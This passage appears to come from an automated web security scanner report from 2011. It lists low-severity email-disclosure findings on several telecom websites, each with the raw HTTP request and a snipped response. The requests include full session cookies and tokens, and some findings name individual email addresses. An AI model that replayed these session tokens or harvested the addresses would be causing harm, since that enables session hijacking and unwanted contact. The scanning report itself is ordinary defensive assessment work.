Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:06 GMT
Server: ConcentricHost-Ashurbanipal/2.0 (Concentric(R))
X-RL-Host: pweb109
X-Robots-Tag: noindex,nofollow
Last-Modified: Wed, 31 Aug 2011 22:29:49 GMT
ETag: "15f966a-5607-4e5eb5dd"
Accept-Ranges: bytes
Content-Type: text/html
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 22692
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:00 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><meta name="robots" content="noindex,nofollow" />
<meta http-equiv="Content-Type" co
...[SNIP]...
<a href="http://rtsys.rtrk.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&ptt=4&target_email=kheckaman@utdi.com" TARGET="RL_top">
...[SNIP]...
<a href="http://rtsys.rtrk.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&ptt=4&target_email=info@utdi.com" TARGET="RL_top" class="onbluemenu">info@utdi.com</a>
...[SNIP]...

18.14. http://www.aptela.com/mainstylesheet.css/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /mainstylesheet.css/

Issue detail

The following email address was disclosed in the response:

Request

GET /mainstylesheet.css/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://support.aptela.com:9000/tools/ResetPassword.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326402; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.8.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:26:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326409; expires=Wed, 05-Sep-2012 12:26:49 GMT; path=/
Vary: Accept-Encoding
Content-Length: 15669
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> Pag
...[SNIP]...
<a href="mailto:info@aptela.com">info@aptela.com</a>
...[SNIP]...

18.15. http://www.aptela.com/misc/privacy-policy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /misc/privacy-policy/

Issue detail

The following email address was disclosed in the response:

Request

GET /misc/privacy-policy/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; __utma=207344579.967367889.1315327921.1315327921.1315327921.1; __utmc=207344579; __utmz=207344579.1315327921.1.1.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:22 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326382; expires=Wed, 05-Sep-2012 12:26:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fmisc%2F404%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2F33c420cd2ee5ef0c134a240a%2FT2V1%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2F33c420cd2c9d489cd0318b99%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:22 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 20963
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title>Privacy Poli
...[SNIP]...
<a href="mailto:info@aptela.com">info@aptela.com</a>
...[SNIP]...

18.16. http://www.aptela.com/my-account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/

Issue detail

The following email address was disclosed in the response:

Request

GET /my-account/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; exp_last_activity=1315326382; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.2.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326388; expires=Wed, 05-Sep-2012 12:26:28 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:29 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12258
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> My Account
...[SNIP]...
<a href="mailto:info@aptela.com">info@aptela.com</a>
...[SNIP]...

18.17. http://www.aptela.com/my-account/login-error/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/login-error/

Issue detail

The following email address was disclosed in the response:

Request

GET /my-account/login-error/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326388; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.4.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:36 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326396; expires=Wed, 05-Sep-2012 12:26:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:36 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12464
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<meta http-equi
...[SNIP]...
<a href="mailto:info@aptela.com">info@aptela.com</a>
...[SNIP]...

18.18. http://www.comcast.com/Movers/Move.cspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /Movers/Move.cspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Movers/Move.cspx HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}; mbox=session#1315327839174-766376#1315331605|check#true#1315329805|PC#1315327839174-766376.19#1316539345; bn_u=6923713561343025788; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331544344%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331545589%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329851040'%255D%255D%7C1473182651040%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20SC_LINKS%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 54374
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Tue, 06 Sep 2011 12:24:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
   <script type="text
...[SNIP]...
<a href="mailto:comcast_move@cable.comcast.com" id="ctl00__column2CPH_ContactMovers__emailLnk" title="E-mail Movers Edge">
...[SNIP]...

18.19. https://www.comcastsupport.com/ChatEntry/js/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ChatEntry/js/jquery.cookie.js HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331924632%3B; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Length: 4295
Content-Type: text/javascript
Content-Location: http://www.comcastsupport.com/ChatEntry/js/jquery.cookie.js
Last-Modified: Tue, 19 Jul 2011 15:03:32 GMT
Accept-Ranges: bytes
ETag: "0ba4762546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:46 GMT

.../**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function (name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

18.20. https://www.comcastsupport.com/ChatEntry/js/jquery.jqprint.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/js/jquery.jqprint.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ChatEntry/js/jquery.jqprint.js HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331924632%3B; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Length: 2619
Content-Type: text/javascript
Content-Location: http://www.comcastsupport.com/ChatEntry/js/jquery.jqprint.js
Last-Modified: Tue, 19 Jul 2011 15:03:30 GMT
Accept-Ranges: bytes
ETag: "08d1652546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:51 GMT

...// -----------------------------------------------------------------------
// Eros Fratini - eros@recoding.it
// jqprint 0.3
//
// - 19/06/2009 - some new implementations, added Opera support
// - 11/05/2009 - first sketch
//
// Printing plug-in for jQuery, evolution of jPrintArea: http://plugins.jquery
...[SNIP]...

18.21. https://www.comcastsupport.com/ChatEntry/js/jquery.mb.menu/mbMenu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/js/jquery.mb.menu/mbMenu.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ChatEntry/js/jquery.mb.menu/mbMenu.js HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 22272
Content-Type: text/javascript
Content-Location: http://www.comcastsupport.com/ChatEntry/js/jquery.mb.menu/mbMenu.js
Last-Modified: Tue, 19 Jul 2011 15:03:32 GMT
Accept-Ranges: bytes
ETag: "0ba4762546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:39 GMT

/*******************************************************************************
jquery.mb.components
Copyright (c) 2001-2010. Matteo Bicocchi (Pupunzi); Open lab srl, Firenze - Italy
email: info@pupunzi.com
site: http://pupunzi.com

Licences: MIT, GPL
http://www.opensource.org/licenses/mit-license.php
http://www.gnu.org/licenses/gpl.html
**************************************************************
...[SNIP]...

18.22. https://www.comcastsupport.com/ChatEntry/js/plugins/jquery.hoverIntent.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/js/plugins/jquery.hoverIntent.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ChatEntry/js/plugins/jquery.hoverIntent.js HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 4952
Content-Type: text/javascript
Content-Location: http://www.comcastsupport.com/ChatEntry/js/plugins/jquery.hoverIntent.js
Last-Modified: Tue, 19 Jul 2011 15:03:32 GMT
Accept-Ranges: bytes
ETag: "0ba4762546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:39 GMT

.../*******************************************************************************
jquery.mb.components
Copyright (c) 2001-2010. Matteo Bicocchi (Pupunzi); Open lab srl, Firenze - Italy
email: info@pupunzi.com
site: http://pupunzi.com

Licences: MIT, GPL
http://www.opensource.org/licenses/mit-license.php
http://www.gnu.org/licenses/gpl.html
**************************************************************
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

18.23. https://www.comcastsupport.com/ChatEntry/js/plugins/jquery.metadata.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/js/plugins/jquery.metadata.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ChatEntry/js/plugins/jquery.metadata.js HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 3992
Content-Type: text/javascript
Content-Location: http://www.comcastsupport.com/ChatEntry/js/plugins/jquery.metadata.js
Last-Modified: Tue, 19 Jul 2011 15:03:32 GMT
Accept-Ranges: bytes
ETag: "0ba4762546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:39 GMT

/*******************************************************************************
jquery.mb.components
Copyright (c) 2001-2010. Matteo Bicocchi (Pupunzi); Open lab srl, Firenze - Italy
email: info@pupunzi.com
site: http://pupunzi.com

Licences: MIT, GPL
http://www.opensource.org/licenses/mit-license.php
http://www.gnu.org/licenses/gpl.html
**************************************************************
...[SNIP]...

18.24. http://www.fairpoint.com/scripts/jquery/plugins/selectToUISlider.jQuery.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fairpoint.com
Path:   /scripts/jquery/plugins/selectToUISlider.jQuery.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/jquery/plugins/selectToUISlider.jQuery.js HTTP/1.1
Host: www.fairpoint.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24578CF2F7156AB48FCFDA58BB99F9A0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:56:23 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_jk/1.2.23
Accept-Ranges: bytes
ETag: W/"8560-1314312615000"
Last-Modified: Thu, 25 Aug 2011 22:50:15 GMT
Content-Length: 8560
Content-Type: text/javascript

/*
* --------------------------------------------------------------------
* jQuery-Plugin - selectToUISlider - creates a UI slider component from a select element(s)
* by Scott Jehl, scott@filamentgroup.com
* http://www.filamentgroup.com
* reference article: http://www.filamentgroup.com/lab/update_jquery_ui_16_slider_from_a_select_element/
* demo page: http://www.filamentgroup.com/examples/slider_v2/i
...[SNIP]...

18.25. http://www.frontier.com/yahoo/js/CCallWrapper.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /yahoo/js/CCallWrapper.js

Issue detail

The following email address was disclosed in the response:

Request

GET /yahoo/js/CCallWrapper.js HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.asp?type=biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45

Response

HTTP/1.1 200 OK
Content-Length: 3230
Content-Type: application/x-javascript
Last-Modified: Mon, 12 Jul 2010 20:15:12 GMT
Accept-Ranges: bytes
ETag: "048aeeefe21cb1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:29:51 GMT

/*
* CCallWrapper.js
* $Revision: 1.4 $ $Date: 2010/07/12 20:15:12 $
*/

/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
*
* The contents of this file are subject
...[SNIP]...
<bclary@netscape.com>
...[SNIP]...

18.26. http://www.frontierhelp.com/frontiernetnews.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierhelp.com
Path:   /frontiernetnews.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /frontiernetnews.cfm HTTP/1.1
Host: www.frontierhelp.com
Proxy-Connection: keep-alive
Referer: http://www.frontierhelp.com/techsupport.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.41T0x0000000e_0xc7da91deCMYUJ; CFID=2324395; CFTOKEN=20838155; s_cc=true; s_sq=cznpeace%3D%2526pid%253DFrontier%252520Peace%252520of%252520Mind%252520%25253A%252520Tech%252520Support%2526pidt%253D1%2526oid%253Dhttp%25253A//www.frontierhelp.com/frontiernetnews.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:51:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<html>


<link rel="icon" href="http://#request.cName#.frontierhelp.com/frontier.ico" type="image/x-icon">
<link rel="shortcut icon" href="http://#request.cName#.frontierhelp.com/frontier.ic
...[SNIP]...
<a href="mailto:support@frontier.com">support@frontier.com</a>
...[SNIP]...

18.27. http://www.frontierhelp.com/func.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierhelp.com
Path:   /func.js

Issue detail

The following email address was disclosed in the response:

Request

GET /func.js HTTP/1.1
Host: www.frontierhelp.com
Proxy-Connection: keep-alive
Referer: http://www.frontierhelp.com/techsupport.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.41T0x0000000e_0xc7da91deCMYUJ; CFID=2324395; CFTOKEN=20838155

